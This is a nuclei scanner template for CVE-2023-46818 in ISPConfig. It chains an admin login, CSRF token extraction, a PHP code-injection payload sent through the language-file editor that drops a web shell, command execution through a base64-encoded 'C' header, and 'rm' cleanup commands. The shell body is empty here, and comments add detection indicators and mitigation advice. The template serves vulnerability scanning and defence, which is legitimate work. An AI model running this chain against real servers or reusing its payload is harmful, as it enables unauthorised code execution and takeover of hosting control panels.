id: CVE-2023-46818

info:
  name: ISPConfig - PHP Code Injection
  author: non-things
  severity: high
  description: |
    An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
  reference:
    - https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/
    - http://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html
    - http://seclists.org/fulldisclosure/2023/Dec/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46818
  classification:
    # PR:H — the chain below needs a valid admin login (request 1).
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-46818
    cwe-id: CWE-94
  metadata:
    verified: true
    # NOTE(review): the template issues six requests, and nuclei's metadata
    # key is normally spelled max-request — confirm this value.
    max-requests: 1
    product: ispconfig
  tags: cve,cve2023,ispconfig,php,rce

# Each step runs only if the previous one matched, so the cleanup requests
# (5 and 6) are skipped whenever request 4's matchers fail; an operator should
# verify that no file named like websh-file or lang-file remains afterwards.
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

variables:
  # Random names for the two artifacts this template creates on the target:
  # a language file and a PHP file under /admin. Their random, fixed-length
  # names (26 alpha / 32 alphanumeric) are a useful hunting indicator in
  # web-root listings and file-integrity monitoring.
  lang-file: "{{rand_text_alpha(26)}}.lng"
  websh-file: "{{rand_text_alphanumeric(32)}}.php"
  # Empty on this page, so base64 of it is empty, the file request 3 drops is
  # blank, and request 4's word matcher cannot match.
  websh: ""
  websh-base64: "{{base64(websh)}}"
  # Value submitted through the records[\] form field of the language editor;
  # it is written into the language file and later evaluated as PHP (CWE-94).
  payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#"
  payload-url-enc: "{{url_encode(payload)}}"
  # Marker echoed back in request 4 to prove execution.
  echo-cmd-hash: "{{rand_text_alphanumeric(32)}}"
  echo-cmd: "echo {{echo-cmd-hash}}"

http:
  # 1. Admin login. username/password are not defined in variables above and
  #    must be supplied at run time.
  - raw:
      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&s_mod=login

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Set-Cookie")'
          - 'status_code == 302'
        condition: and

  # 2. Open the language editor for a new file to obtain the CSRF tokens and
  #    the on-disk path of the language file (used by the cleanup in 5).
  - raw:
      - |
        POST /admin/language_edit.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        lang=en&module=help&lang_file={{lang-file}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(response, "_csrf_id", "_csrf_key")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: lang_file_location
        group: 1
        regex:
          - "Language file: (.*)"
        internal: true

      - type: regex
        name: csrf_id
        group: 1
        regex:
          - "_csrf_id\" value=\"(.*)\" />"
        internal: true

      - type: regex
        name: csrf_key
        group: 1
        regex:
          - "_csrf_key\" value=\"(.*)\" />"
        internal: true

  # 3. Save the language file with the payload. Detection: a POST to
  #    /admin/language_edit.php whose body carries records[%5C] (a backslash
  #    key) is not produced by normal editor use.
  - raw:
      - |
        POST /admin/language_edit.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        lang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'

  # 4. Verify execution: request the dropped file and expect the marker back.
  #    Detection: GET requests for an unknown .php under /admin carrying a
  #    base64 value in a non-standard "C" header. The Content-Type header on
  #    this and the following GETs describes no body and is harmless.
  - raw:
      - |
        GET /admin/{{websh-file}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        C: {{base64('§echo-cmd§')}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "{{echo-cmd-hash}}"

  # 5. Best-effort cleanup of the language file. A 200 status alone does not
  #    confirm the deletion succeeded.
  - raw:
      - |
        GET /admin/{{websh-file}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        C: {{base64('rm §lang_file_location§')}}

    matchers:
      - type: status
        status:
          - 200

  # 6. Best-effort self-removal of the dropped PHP file; same caveat as 5.
  #    Mitigation per the description: upgrade to 3.2.11p1 or later and keep
  #    admin_allow_langedit disabled.
  - raw:
      - |
        GET /admin/{{websh-file}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        C: {{base64('rm §websh-file§')}}

    matchers:
      - type: status
        status:
          - 200

# Signature line as published; it covers the template bytes, so any edit to
# the file (including reformatting) invalidates it until re-signed.
# digest: 4b0a00483046022100b1477a1e39d3f98efffd283596a2a924a6381e8a6c7a640e99afc1128b907abd022100dac9d4a63ce04aed8df7a74d631dd9774ff4a6e4ee75579fced5cd3c0681d631:922c64590222798bb761d5b6d8e72950